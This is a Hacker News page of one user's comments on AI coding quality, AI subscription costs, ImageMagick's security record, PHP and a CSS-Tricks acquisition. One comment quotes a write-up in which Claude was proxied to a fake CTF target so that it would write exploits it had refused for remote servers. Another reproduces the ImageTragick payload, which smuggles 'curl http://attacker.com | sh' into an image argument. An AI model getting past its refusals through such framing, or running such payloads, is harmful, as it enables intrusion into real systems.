Hacker Newsnew | past | comments | ask | show | jobs | submit | oefrha's commentslogin

> the ~government~ implicated itself provided

FTFY. Almost one and the same here but gives more context.


If AI coding isn’t lowering your code quality, you have a low starting point.

I feel like this is the deal. If you already have a revolving door of tons of entry level developers you hire to churn code then AI agents are no difference to your process. The thorough approval and testing process you already have from that works the same.

I want to take this seriously, but eight (slop?) rehash of the story on the blog isn’t helping with credibility. Pro tip: don’t do that, however triggered you are, it definitely doesn’t help.

I don’t use Google AI Studio so can’t verify, good luck.


thx!!!!!

I’ve also seen people put a lot of effort and love into poster and stuff because that interests them (doesn’t mean they’re good at it either), then the event is utter crap because they didn’t spend much time on the actual event.

I’m paying $200/mo for non-crap versions of said “general-purpose problem-solver tool”, which is not far from the median income of “everyone on the planet with Internet connection”. And I’m told I’m already getting a huge discount by using thousands of dollars of compute by raw API pricing. That just doesn’t sound like peanuts at all.

The $200/mo version you're paying for today is the one that will be ~free for everyone in 6 months. You're only paying to use the bleeding edge of technology that improves so fast, and drops in costs so fast, that the entry-level free offering today is better than most expensive tier a year ago, and beyond science fiction just three years ago.

I swear most people dissing AI with such arguments must perpetually live in a moment and have zero concept of passage of time.


I fail to see how I’m “dissing AI”. I use it almost every fucking waking hour after all, both professionally and personally. I just don’t pretend it’s free/cheap (especially when you mention it in the context of “everyone only the planet”), or even more ridiculously, some charitable gift from Big (AI) Tech to the world. And if you look into my comment history I’m pretty clear I support IP free-for-all; cat’s out of the bag, just don’t talk two-faced nonsense like “distillation attacks” and I’m fine with it. And as a prolific open source contributor with popular projects, including at least one under GPL, they definitely stole from me—again, fine with it.

They did say how:

> We then placed Claude in an autonomous /goal loop against our own Discourse Cloud instance, proxied through rce.ee/ctf-forum to make it look like a CTF target as Opus refused write exploit for remote instances.


Unsandboxed ImageMagick is known for being a security nightmare even back when PHP ruled the world (not saying sandboxing is a panacea either, it just requires a different and potentially harder exploit to develop a full chain). Difference is it's easier than ever to turn vulnerabilities into full compromises. At some point we'll have to replace all parsers with something at least as safe as https://github.com/google/wuffs right? Otherwise ImageMagick and co. will just keep giving.


At this point writing a media file parser in C/C++ is absurdly stupid. The same thing happened with libjxl.

Also libwebp.

It does make me wonder how much this could be hardened by, to put it in an extremely crude way, taking the current imagemagick code base and throwing a bunch of adversarial SOTA LLMs at it to discover 'bugs' and exploits of this nature until it can be coaxed into a less dangerous state. Or even using the LLMs to fully port its functionality to a memory safe language. Would take a while to get all the changes approved and then into various distribution imagemagick packages.

I suspect the latter is much easier and cheaper than the former? You can port a lot of software with cheap (or even local) models if you're tenacious whereas finding all the bugs is both very very expensive (if it's even possible) and potentially never ending (there's always new code and bugs!).

Many of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help.

Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"


That's a very good point. I've had moderately good success with even not very smart LLMs 'fixing' things that would otherwise accept arbitrary user generated text input, to run things through a thorough sanitization pipeline, the actual code for a sanitizer is not very complex at all.

Maybe these big ai labs will uses their own devices to find and fix bugs up and down their stack and contribute that back.

PHP still rules the world, even though many doesn't want to realize it. It's still the biggest web language by a far margin

Phones don’t “rule the world” of cinematography, despite the majority of videos being from phones. The serious stuff, professional and personal, uses cameras.

too powerful to give up, sweet imagick love

Kudos for at least admitting upfront that it’s pure slop, I guess.

The quota consumption is based on the upfront possible number of connections given the query, not actual connections, so deeply nested queries can be very expensive if not aware and careful about it.

In this case CSS-Tricks got paid $4m first, so probably the wrong entity to be complaining about funding. But maybe the lead editor in question who’s not the creator didn’t see much of that?

CSS-Tricks didn't get paid $4m. They got acquired. The previous owner of CSS-Tricks got $4m.

Got acquired => got paid. CSS-Tricks the entity (up to the point of acquisition) got paid the money. If and how the money was divided between the people involved doesn’t seem be public info.

It wasn't divided.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: